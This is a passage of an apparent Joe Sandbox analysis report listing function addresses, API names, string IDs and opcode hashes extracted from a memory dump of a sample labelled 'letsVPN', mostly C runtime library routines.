                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a6e3db9f86bfa185145943c2ba9ce5d8d32fd3de24b8126471decbf8e0ce72a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB318F32604A49C5EBA2DB15E4403E97361F798BE0F58C222FA6E476E5DF38C649C700
                                                                                                                                                                                                    Function 0000000180017943 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$_errno_getbuf_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 529825914-727254517
                                                                                                                                                                                                    • Opcode ID: cc76a341ef07ff02e66934f871a271293264bcbd1b961555f6f48946797c890b
                                                                                                                                                                                                    • Instruction ID: c0300bd97ada1db871bbceb5b6fe5c5fc260a35d5586f6bf35c04e3b7f5dfd1b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc76a341ef07ff02e66934f871a271293264bcbd1b961555f6f48946797c890b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6121A632714A8842EBA78725D6453FC27B0F759794F548605EB6A439D3CF28D3AD8740
                                                                                                                                                                                                    Function 00000001800116CF Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProcstd::exception::exception
                                                                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 1703389215-340411864
                                                                                                                                                                                                    • Opcode ID: d9a9fe5c5a4631ccb24c9dd95b72265727b306f07ef7fc7b131185eeea6a4b29
                                                                                                                                                                                                    • Instruction ID: 40ddd88acbf1a00d0738532e652d1d6ecf7fc29d0571a400658d68e487efbca5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9a9fe5c5a4631ccb24c9dd95b72265727b306f07ef7fc7b131185eeea6a4b29
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4017C74605F488AFBDBDB65B8553E423A1AB4DB81F448025ED1E423A1EF3C868DC300
                                                                                                                                                                                                    Function 000000018002489F Relevance: 12.2, APIs: 8, Instructions: 151fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _lseeki64_nolock$CloseErrorFileHandleLast__create_close_nolock_dosmaperr_errno_free_osfhnd_get_osfhandle_write
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3571818248-0
                                                                                                                                                                                                    • Opcode ID: ac6e27d9cca6aa17dc29c3c82d3b4841349e8a2d996987247107110dfd4e7de9
                                                                                                                                                                                                    • Instruction ID: f5e863b8e90898d0d1dd555edfc154885d718558064089736708c50343d3e3f4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac6e27d9cca6aa17dc29c3c82d3b4841349e8a2d996987247107110dfd4e7de9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51510633B24A4C46FBA7CB68C4943EC2760A749BA8F14C215FA6A5B7D5CE38C949C701
                                                                                                                                                                                                    Function 0000000180002A5C Relevance: 10.5, APIs: 7, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_errnosetlocalestd::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1855319098-0
                                                                                                                                                                                                    • Opcode ID: 3fc12b65c93056fb327cb2e9bed3c9868cb1a42e88eb998ba55260f1ddffa39a
                                                                                                                                                                                                    • Instruction ID: 77f0e84e2c0fddebd83e6d166913a46376ceeea5f20c07d06525607cc615e4e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc12b65c93056fb327cb2e9bed3c9868cb1a42e88eb998ba55260f1ddffa39a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9511ED72B0298849FFEFDEA280A53FC2351DF5DF88F188115E90609186CE65CACCD391
                                                                                                                                                                                                    Function 00000001800140E0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                    • Opcode ID: a5c0f66d2e7d186b889667cfdb443e7186d6aa942a0e8dfcef2529b2febc3be5
                                                                                                                                                                                                    • Instruction ID: 3db9a0fe6634f3d3d23e1512d5a19f59bf1e8e73e648120e41056d0fc3e5ac56
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5c0f66d2e7d186b889667cfdb443e7186d6aa942a0e8dfcef2529b2febc3be5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F03037A0490CD5E7A76F6480063EC35A0E7ACB89F99C561B2004B392CFBD47C88B12
                                                                                                                                                                                                    Function 000000018001C414 Relevance: 9.2, APIs: 6, Instructions: 168COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    • Opcode ID: e7968ec26cbcd9171451e4b14a09e52ad3a64d5c50effb9d52f7b38fbe92b25e
                                                                                                                                                                                                    • Instruction ID: ae10803b799a65974c3657ee31f7494a09801b087079cfbaffe163c152ee371c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7968ec26cbcd9171451e4b14a09e52ad3a64d5c50effb9d52f7b38fbe92b25e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D761C032300F4893EB96DB16E94179A33A1F78CBD8F448129AE5D07B51DF78C6A98744
                                                                                                                                                                                                    Function 0000000180019D1C Relevance: 9.1, APIs: 6, Instructions: 134COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Locale_errno$ErrorFreeHeapLastSystemUpdateUpdate::__setmbcp_nolock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 75022149-0
                                                                                                                                                                                                    • Opcode ID: c505612558760a02bbe298b45e3a9e656f110e3789c69d640b033d38dfb25e56
                                                                                                                                                                                                    • Instruction ID: 6a68ccb5b672a7b7b33fbd37b402f8a3b6eb5461299a8b9bcf453a44c8b75bba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c505612558760a02bbe298b45e3a9e656f110e3789c69d640b033d38dfb25e56
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051D732901E8882E792CB69C5403F877A1F79DB88F14D615EE5D47292DF79D6CAC700
                                                                                                                                                                                                    Function 000000018001C9A7 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$StringType__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3694965756-0
                                                                                                                                                                                                    • Opcode ID: 6160b9118bac4664cca1a2b30361e3e73a9a23b4989b95d1f03a7ad33b2cdca4
                                                                                                                                                                                                    • Instruction ID: 0015738cc1d336f68e0dd6607cf263a8890d2d7f9e42c5be51a897ba0436e770
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6160b9118bac4664cca1a2b30361e3e73a9a23b4989b95d1f03a7ad33b2cdca4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F441CEB2211BC89ADB9ACF25D584BDD33A5F74C788F418126EA4A83B90DF34C669C704
                                                                                                                                                                                                    Function 0000000180003995 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand
                                                                                                                                                                                                    • String ID: VUUU$gfff
                                                                                                                                                                                                    • API String ID: 415692148-2662692612
                                                                                                                                                                                                    • Opcode ID: aed1710db1e936c5847142b025d1a392848f4d806a2ba50e9dea0159a85771d3
                                                                                                                                                                                                    • Instruction ID: f4854c72ffc7a175e6ff49575b655bf0dbf9db01d82d8384a320940945799e3f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aed1710db1e936c5847142b025d1a392848f4d806a2ba50e9dea0159a85771d3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83313D3232499885F79FCA2F94077DC6655938EBC0F48D029A6468B7C6DF7587858342
                                                                                                                                                                                                    Function 000000018001FB38 Relevance: 9.1, APIs: 6, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1281092736-0
                                                                                                                                                                                                    • Opcode ID: ff445e7ee76754bc769ad26fae53bc8746bb45603988ba5daee99b6cacf2494f
                                                                                                                                                                                                    • Instruction ID: 4f06c6f3f5a15a002521f997a85629dd4504b6509dbf14092c61ae02f8fed3b5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff445e7ee76754bc769ad26fae53bc8746bb45603988ba5daee99b6cacf2494f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E317C72604B8886E7A29B11D5847ADB6A5F74CBE0F148121FE5807B95CF34CA8AD740
                                                                                                                                                                                                    Function 0000000180012CBE Relevance: 9.0, APIs: 6, Instructions: 15COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeapProcess_heap_init_mtinit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 580264708-0
                                                                                                                                                                                                    • Opcode ID: f3e7a6cde2a6d7d1d2d6fc7e9f9cba91a86686b44dc750b74f80f48ea7706f68
                                                                                                                                                                                                    • Instruction ID: 539b000d1fa2fc10cc21c1703bf0313836cf8493cc9b6bf93ce020ad1b8767a5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3e7a6cde2a6d7d1d2d6fc7e9f9cba91a86686b44dc750b74f80f48ea7706f68
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E0BD30605F0E82FBC3B3B1690A3D922945B5E3E4F00C120B808812A3EE65836C83A2
                                                                                                                                                                                                    Function 0000000180013FE3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$ExceptionRaise_amsg_exit_getptd_noexit
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 2951875022-1018135373
                                                                                                                                                                                                    • Opcode ID: 962e7cb3e89cea5562c49c3031c35959d4cae53a636a84b1a964e2033da49479
                                                                                                                                                                                                    • Instruction ID: 1ea455a6890135db2acfd04d796b689a85a8afa8928af47ad612c471f8f71858
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 962e7cb3e89cea5562c49c3031c35959d4cae53a636a84b1a964e2033da49479
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C21FF37204A4886E7B2DF16E04079E77A0F78DBA9F048215EF9907795CF39D58ACB01
                                                                                                                                                                                                    Function 000000018000EB24 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$EncodeFileHeaderPointerRaiseThrow_callnewh_calloc_crt
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 2702659324-2104205924
                                                                                                                                                                                                    • Opcode ID: 5bae105f3c952d40fb91f665a23065520cc5472c36bec98307b8226bbcaa616f
                                                                                                                                                                                                    • Instruction ID: dc9fa018054779c8fcebb0e85de3db94547e0c3b80cccd7f8437f53606e47c3f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bae105f3c952d40fb91f665a23065520cc5472c36bec98307b8226bbcaa616f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C011AC71601B4D81EFABDB60A8513E973A4E75D3C0F448124AA4A0A7A5EF38C39DC740
                                                                                                                                                                                                    Function 0000000180009520 Relevance: 7.7, APIs: 5, Instructions: 153COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: fgetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2807381905-0
                                                                                                                                                                                                    • Opcode ID: 66ab226773c4ed29c2b3b73b3ffce2dcde4310284dfe12c51d04ebbb69d2a6f4
                                                                                                                                                                                                    • Instruction ID: 78140f8f51e7571bcd2013dda56526475d110ba6fe59e891c556e2589ded328f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66ab226773c4ed29c2b3b73b3ffce2dcde4310284dfe12c51d04ebbb69d2a6f4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8711537216A84D9EBA2CF75C4903DC33A5F748B98F548622EA5D87B99DF35C658C300
                                                                                                                                                                                                    Function 0000000180024C4C Relevance: 7.6, APIs: 5, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                    • Opcode ID: 914c7e8c9e0c7ea7e7598fbd7753b30a9f1dd545e222c54bf50bce79fb68c9f0
                                                                                                                                                                                                    • Instruction ID: 512f3f5380ac9d776c87858e981df87ea363a793a3dc2e47b707a79be0fa403e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 914c7e8c9e0c7ea7e7598fbd7753b30a9f1dd545e222c54bf50bce79fb68c9f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C41F273A0169982EBF7AB25E1403F973A0E748BD5F94C126FA950B6C5DF28CB59C700
                                                                                                                                                                                                    Function 000000018001E5F0 Relevance: 7.6, APIs: 5, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                    • Opcode ID: fef4be43230211745b757583544e173985db2e9b550421944e270028302490ac
                                                                                                                                                                                                    • Instruction ID: 590762b1f0db7b029fd590709c2b03e69e4f35f6dcab51a84d546098a8333d68
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fef4be43230211745b757583544e173985db2e9b550421944e270028302490ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15410672A04AE982EBE65B1194503FD33A0E769BE0FD4C126F6D5076C4DE28CB598700
                                                                                                                                                                                                    Function 000000018001EF00 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2998201375-0
                                                                                                                                                                                                    • Opcode ID: 9e4fadaa998d07455157caef082a8ac16103ede1be2d2d3d04bf9a7975dcdca8
                                                                                                                                                                                                    • Instruction ID: 6da1e2860e90ad5ce6891b8704c71763f15746ac8b0e06677ba9dfa64d3fdf9b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e4fadaa998d07455157caef082a8ac16103ede1be2d2d3d04bf9a7975dcdca8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7441A432214BC486E7A28F15D1807AD7BA5FB49BC4F18812AFF8957B95CF38C646C700
                                                                                                                                                                                                    Function 000000018000E174 Relevance: 7.5, APIs: 5, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
